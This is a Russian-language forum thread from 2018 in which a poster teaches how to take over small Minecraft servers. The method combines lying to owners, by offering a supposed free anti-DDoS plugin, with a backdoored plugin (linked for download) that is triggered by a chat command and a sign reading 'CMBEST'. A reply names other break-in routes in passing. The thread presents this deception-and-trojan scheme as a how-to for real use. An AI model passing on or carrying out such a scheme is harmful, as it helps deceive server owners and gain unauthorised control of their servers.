Загрузка...

Взлом серверов майнкрафт через плагин

Тема в разделе Minecraft создана пользователем Molchan0FF 1 апр 2018. 4748 просмотров

Опрос

Нормальный способ?

1. 1) Да

15
    65,2%
  2. 2) Нет

8
    34,8%
  1. Molchan0FF
    Molchan0FF Автор темы 1 апр 2018 Заблокирован(а) 0 1 июн 2017
    Всех приветствую, сегодня я вас научу взламывать сервера майнкрафт через плагин.
    Давайте приступим.

Начнём с того, что нам нужно для взлома.
    Плагин для взлома
    1. Правильный подход к людям
    2. Умение врать
    Итак, давайте найдём любой школо-сервер. Найти их можно в мониторинге серверов майнкрафт - http://monitoringminecraft.ru (не реклама)
    Переходим там во вкладку новые сервера и выбираем версию игру, ну например 1.8.9.
    Там выбираем любой сервер, который нам понравится и заходим на него.

Итак, первая часть ПЛАНА выполнена, теперь нам нужно *****ся в доверие владельца сервера, сказать, что подгонишь ему бесплатно плагин на Анти-ДДОС. Если он согласится, то первая часть ВЗЛОМА выполнена.

Кидаем ему плагин (ссылка на него в конце темы), он его ставит на сервер, перезапускает сервер и...
    Нам нужно проверить, присутствует ли плагин. Прописываем в чат команду /cm (английским буквами =) )
    Если пишет в чате: "Yes im here!" Тогда всё супер и вы про хакер.
    Далее крафтим табличку И В ПЕРВОЙ СТРОКЕ ТАБЛИЧКИ ПИШЕМ: CMBEST
    Ииии, в чате пишется мой ник и поздравления, ну впринципе всё, проверяйте на локальных серверах, спасибо за внимание.
    Ссылка на плагин - https://yadi.sk/d/n4RcA8Lf3TxYRt

2. Molchan0FF
    Ребят, это моя первая тема, так что прошу вас написать, что мне добавлять, а что убрать, в следующих темах будут картинки, спасибо.

3. restrykt
    restrykt 1 апр 2018 CIGIL TOP! 60 18 июл 2017
    Ну БЛЯтЬ... Это старый способ, на него никто не видеться. Лучше чекать через базы и ломать сервера с онли. Ещё через порты можно. Много способов эффективных...

4. Molchan0FF
    Хорошо, спасибо, солью новый способ в скором времени

Загрузка...